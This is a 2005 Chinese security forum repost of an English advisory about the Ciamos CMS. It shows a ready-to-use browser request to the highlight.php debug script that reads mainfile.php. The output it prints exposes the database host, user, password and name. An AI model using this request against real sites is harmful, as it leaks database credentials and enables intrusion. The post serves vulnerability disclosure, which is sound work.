[转载]Ciamos Highlight.php安全漏洞

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9861
精华: 771
积分: 40900
阅读权限: 200
性别: 男
在线时间: 3984 小时
注册时间: 2004-7-4
最后登录: 2008-11-18

发短消息
加为好友
当前离线

楼主大中小发表于 2005-3-21 07:54 只看该作者

[转载]Ciamos Highlight.php安全漏洞

信息来源：NT NT ihsteam com

If You Have CIAMOS Installation Address You Can Use highligh.php Hole
And Get DataBase Configuration(Name,User,Password)
Tested In CIAMOS
-------------------------------------------
Input This Line To Your Browser AddressBar :

http://targetsite/ciamosinstalation/class/debug/highlight.php?
file=ciamosinstallationpath\mainfile.php&line=151#151

Like This :

http://localhost/ciamos/class/debug/highlight.php?
file=c:\phpdev\www\ciamos\mainfile.php&line=151#151

You See This Result :

复制内容到剪贴板

代码:

1 <?php 

2 /** 

3 * Ciamos: Simple + Flexible + Advanced Content Management 

4 * < [url]http://www.ciamos.com[/url] > 

5 */ 

6 

7 if ( !defined(&#39;CIAMOS_MAINFILE_INCLUDED&#39;) ) { 

8 define(&#39;CIAMOS_MAINFILE_INCLUDED&#39;, true); 

9 

10 // Ciamos physical path 

11 define(&#39;SYS_ROOT_PATH&#39;, &#39;c:/phpdev/www/ciamos&#39;); 

12 

13 // Ciamos URL without trailing slash 

14 define(&#39;SYS_ROOT_URL&#39;, &#39;[url]http://localhost/ciamos[/url]&#39;); 

15 

16 // Folder name for your modules folder 

17 define(&#39;SYS_MOD_FOLDER&#39;, &#39;modules&#39;); 

18 

19 // Ciamos database layer 

20 $sysConfig[&#39;database&#39;] = &#39;mysql&#39;; 

21 

22 // Ciamos table prefix 

23 $sysConfig[&#39;prefix&#39;] = &#39;ciamos&#39;; 

24 

25 // Ciamos database host 

26 $sysConfig[&#39;dbhost&#39;] = &#39;localhost&#39;; 

27 

28 // Ciamos database user 

29 $sysConfig[&#39;dbuname&#39;] = &#39;root&#39;; 

30 

31 // Ciamos database password 

32 $sysConfig[&#39;dbpass&#39;] = &#39;&#39;; 

33 

34 // Ciamos database name 

35 $sysConfig[&#39;dbname&#39;] = &#39;ciamos&#39;; 

36 

37 // Persistent database connection? 

38 $sysConfig[&#39;db_pconnect&#39;] = 0; 

39 

40 // Ciamos default language 

41 $sysConfig[&#39;default_language&#39;] = &#39;english&#39;; 

42 

43 /** 

44 * End edit - do not change anything below this line 

45 */ 

46 

47 if ( (SYS_ROOT_PATH == &#39;&#39;) && (@file_exists

(&#39;_install/index.php&#39;)) ) { 

48 header(&#39;Location: _install/index.php&#39;); 

49 exit(); 

50 } 

51 include_once(SYS_ROOT_PATH.&#39;/include/common.php&#39;); 

52 } 

?>

More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12

Source Advisory:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=15

Found By NT(IHS)
NT IHSTeam com
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [转载]Ciamos Highlight.php安全漏洞